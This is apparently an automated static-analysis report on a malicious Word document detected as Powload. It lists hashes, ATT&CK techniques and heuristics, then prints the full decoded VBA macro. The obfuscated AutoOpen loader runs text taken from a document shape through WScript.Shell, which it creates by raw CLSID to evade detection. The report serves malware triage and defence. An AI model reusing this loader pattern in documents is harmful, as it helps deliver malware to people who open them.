Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8835101ef9d1a985…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 141.9 KB
Created: 2018-11-28 06:44:00
Authoring application: Microsoft Office Word
First seen: 2019-02-26
MD5: 794992e6481e9d3cea30cd029b11602f
SHA-1: fd82d802a40ea5213a1189a05bdd10e7c174089c
SHA-256: 8835101ef9d1a98559c559e0033210e309f98bfce6bc0883f2016e2eed70ab2e
Risk Score: 252

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The macros instantiate the dangerous WScript.Shell COM class by its raw CLSID and reference PowerShell, indicating an attempt to download and execute a second-stage payload. The AutoOpen macro and the GetObject call further support this assessment. The ClamAV detection confirms its classification as malware.

Heuristics (9)

  • ClamAV: Doc.Malware.Powload-6809722-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6809722-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched lines in script:
      Next
      Set wbDRPFLl = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + ViRjYvaid + MwOOBQ + GBDXcMtSF + soMziqAA)
         On Error Resume Next
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched lines in script:
      Next
      Set wbDRPFLl = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + ViRjYvaid + MwOOBQ + GBDXcMtSF + soMziqAA)
         On Error Resume Next
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
      Attribute VB_Customizable = True
      Sub AutoOpen()
         On Error Resume Next
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6451 bytes
SHA-256: ee286bd55db9b5be499e31daf1fa8551c473818bbc743f3affa2d0f094f3cbab
Detection
ClamAV: No threats found
Obfuscation or payload: likely
130 of 217 identifiers look randomly generated (e.g. 'faUYpYZUpUK'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "faUYpYZUpUK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case OSrtS
      Case 255674312
         pBXaaJWzt = CBool(CQhXarTPj)
         QhkakUP = 180620499
      Case 331298590
         nWrwN = Atn(KZFrqvR)
         Kdojna = Atn(158734400 * CLng(200099172))
   End Select
         For Each PjIQzqGu In BnFjYkKDj
         JpjUPUPGf = oXhJkcQF * CDate(Njzwv * iLiFEZjui) * wiLswij / Sin(OGdFvwv) / EwTKJs + 245907704 - 178023492 + Chr(241812794) + (kAaFE * DontEMJ)
Next
   On Error Resume Next
Select Case cjwUEVjQ
      Case 157674506
         mPWIZIV = CBool(wmHZtAZ)
         vvsKYiwSi = 161949798
      Case 33453396
         nTIvNkJwp = Atn(ciUGWPcC)
         vuIalYNAE = Atn(107944478 * CLng(27998458))
   End Select
         For Each BDbqddM In JrdGLS
         pSLip = iJzftXW * CDate(jFflGbitQ * lPqjERBOS) * YithOB / Sin(ubKkGp) / ZlzUEr + 208116454 - 316745162 + Chr(10949562) + (wZlCEh * iFIbBLw)
Next
   On Error Resume Next
Select Case HJizRcpmi
      Case 47064681
         EGEvimkqD = CBool(uUiCbc)
         IUihk = 34054576
      Case 85277484
         miqjXP = Atn(TzhkYAbn)
         lkcNozu = Atn(275870058 * CLng(342282938))
   End Select
         For Each dJYQUBrk In HuKfELBkV
         DEhhMvzcz = nkAjmlY * CDate(hMjhPffba * XCnOY) * wjwcLUUYs / Sin(IXuitT) / GCIIWoBB + 242769668 - 138026061 + Chr(306157253) + (whYLB * FowiNsKo)
Next
Set IkRFJ = Shapes("iRNTTkEX")
   On Error Resume Next
Select Case osuYXCit
      Case 295018429
         sVjKrnwk = CBool(TpJVEj)
         mWGmEplQ = 78682907
      Case 283984609
         FYGnG = Atn(LssMJn)
         AjStriWq = Atn(289466166 * CLng(251394752))
   End Select
         For Each HmGiDj In wAmsML
         juJLnYci = lVWrYh * CDate(KOmqfT * hpJtL) * BIWGNIjM / Sin(ENnYUVJ) / ruRfbiaV + 6094030 - 100801838 + Chr(257139180) + (WiiRvRc * PiPzIjJYC)
Next
lHvBmAR = "" + lMtwjHZi + XIRzuIZ + CsKRMfT + IkRFJ.TextFrame.TextRange.Text + UBTuPAEO + WmrwBiR
   On Error Resume Next
Select Case NnGMz
      Case 289682474
         tfYmj = CBool(lzEEKLHm)
         bkiAK = 279685323
      Case 261578473
         EsDpzGC = Atn(vRPFqKY)
         fhGmT = Atn(326775517 * CLng(339107201))
   End Select
         For Each PFMWhzhN In JTtdw
         tCiOusjR = LYUdkA * CDate(GtOas * jrwkBAhri) * jtNkojF / Sin(inwKIiDdE) / MAPWv + 334207773 - 145874307 + Chr(254601907) + (KqjjYh * lkXQOXnRr)
Next
Set wbDRPFLl = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + ViRjYvaid + MwOOBQ + GBDXcMtSF + soMziqAA)
   On Error Resume Next
Select Case zZEmp
      Case 342235524
         qjAIs = CBool(iGGPwolb)
         zqzcslvwr = 20137050
      Case 227462030
         qmMzQi = Atn(pnimdv)
         EUXDGihz = Atn(187876579 * CLng(91969560))
   End Select
         For Each MHOvhIFK In oTuPiJ
         mKODThI = bbowzirK * CDate(KDXwtGahT * wkZHUwJ) * oOKVfzjUG / Sin(IKowJw) / fmasE + 263307888 - 148762357 + Chr(2765764) + (LwBTT * qjCvo)
Next
   On Error Resume Next
Select Case YQdqHjS
      Case 142490304
         UzkjG = CBool(FPoiFN)
         mivZifs = 271971788
      Case 192246761
         bPuWW = Atn(MYbsHv)
         dcNsb = Atn(228125501 * CLng(21767869))
   End Select
         For Each GHDdvuhw In dLroJRMq
         zbKdVNrZ = zVmQGZ * CDate(UHqsbYi * oPwDUTL) * CslbX / Sin(mqmVbkc) / MEROp + 62540871 - 139942869 + Chr(328867259) + (YwkpG * nFwmUk)
Next
   On Error Resume Next
Select Case mopaHh
      Case 184208085
         wdbFmS = CBool(dvnOqaWYG)
         TsDhVUCHw = 198218374
      Case 296527078
         mHQoCq = Atn(TXmLiDBz)
         qtQQid = Atn(258243970 * CLng(270291853))
   End Select
         For Each icJYzqo In KIjwCYfln
         hjZiUVl = COckJT * CDate(PUNiuav * hssTSoV) * ivDFIzEI / Sin(njoaUazM) / mDRHtzm + 63194703 - 290506160 + Chr(248818879) + (CScjdwo * OTQQF)
Next
Const KXjopJqQVC = 0
   On Error Resume Next
Select Case tFfdnWd
      Case 212846971
         kiWMWM = CBool(DqLtHd)
         zVzOGEt = 154974443
      Case 89581097
         ITCwYjs = Atn(HZQSJK)
         rdEFzlT = Atn(103153478 * CLng(179759807))
   End Select
         For Each HqIXbWNQ In ECKOfGThz
         NhMmm = boSNrp * CDate(aQQtk * jCDCQGYh) * YwjDTL / Sin(wvEVIA) / uCBPwjzO + 89526417 - 232952097 + Chr(292991030) + (BKivjO * LPThnVsN)
Next
   On Error Resume Next
Select Case wWQHG
      Case 281533608
         iiAzU = CBool(nRMczLc)
         oRjTq = 317670696
      Case 82011226
         jmXWMjWHM = Atn(ziTAh)
         TIEoWIbKH = Atn(49282546 * CLng(64330135))
   End Select
         For Each hoQuq In vNZwPHuEP
         OzjokrAhr = UaKNOEW * CDate(ZYoCoc * TSUtz) * StjvJYVTq / Sin(iDSVUDMj) / lcirGM + 64530750 - 42321749 + Chr(235915176) + (ZjotiC * dSFjBwjk)
Next
   On Error Resume Next
Select Case TQCoa
      Case 52318282
         TvqWNITv = CBool(NKMilczm)
         CwQJNSk = 13316685
      Case 179219173
         uvzujNHHw = Atn(qPiEnXiT)
         XrQQM = Atn(158367170 * CLng(73891497))
   End Select
         For Each KhYlLhT In lNQcU
         VCHmmOM = qnRzEId * CDate(nWYpzZYt * hOCCJOqk) * WNJalwLor / Sin(UOdLYFat) / ffviN + 44073096 - 35321928 + Chr(427502) + (TjZaM * mPWNl)
Next
wbDRPFLl.Run# lHvBmAR, KXjopJqQVC
   On Error Resume Next
Select Case ZZospa
      Case 18887246
         wiwhs = CBool(CadZYwFvr)
         ESOODz = 105256314
      Case 201604603
         zRzpf = Atn(SWOLwpESv)
         AzWRSJiib = Atn(263502686 * CLng(146316986))
   End Select
         For Each oGwSRc In dCkzbGZrk
         WzASQCBtN = nnROrbFh * CDate(MiYbW * vPAuLs) * tnEoVt / Sin(DwYEpHq) / WFAAsjYP + 334424024 - 160649701 + Chr(193652373) + (UmBzC * VudKDFLJE)
Next
   On Error Resume Next
Select Case vRcMqi
      Case 266785043
         qMGFcnsva = CBool(LSlCwMo)
         ZEHWKYP = 128551712
      Case 224587378
         dnWFKBJ = Atn(pAEaV)
         cMtvitTQ = Atn(157757019 * CLng(93051126))
   End Select
         For Each kqUBh In JFPSnzGIk
         rXoXziXuz = TpoJMPI * CDate(aLpFHKvUG * oNnnuB) * tjqJBSZ / Sin(DXTQF) / YrKiY + 15593671 - 253279695 + Chr(102231417) + (bibGFkr * vnhTfRnY)
Next
End Sub